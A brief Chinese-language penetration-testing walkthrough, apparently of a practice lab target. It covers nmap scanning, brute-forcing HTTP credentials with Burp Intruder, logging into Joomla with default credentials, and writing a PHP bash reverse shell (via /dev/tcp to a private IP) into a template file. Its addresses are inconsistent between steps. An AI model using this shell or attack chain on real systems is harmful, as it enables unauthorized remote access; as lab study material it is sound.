首先,开启命令行窗口输入ifconfig
查看IP地址
端口扫描
nmap
nmap 192.168.190.*
Kali所属的网段进行全网段扫描,其中*
表示通配符0~255。观察开放端口,及对应的不同服务
如果开放的端口有80端口,推测该主机很有可能是一个网站服务器,在浏览器中的地址栏中输入此地址192.168.190.153
尝试进行访问。
进一步扫描该靶场开放的端口信息
nmap -T4 -sV -A 192.168.190.153
-T4 提高扫描速度,-sV 检测服务版本,-A 启用高级扫描选项如操作系统探测和脚本扫描。
依次访问端口查看开放了什么服务
192.168.31.182:8080 # HTTP
抓包,发现是base64加密,类似于tomcat的用户名和密码格式
放到intruder模块,爆破
爆破得到用户名和密码
登录进来
发现是joomla搭建的,直接登后台,默认用户名和密码,joomla,joomla
进来找到index.php
写入反弹shell
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.224.130/5555 0>&1'");
?>
点击TemplatePreview预览index.php
端口监听,成功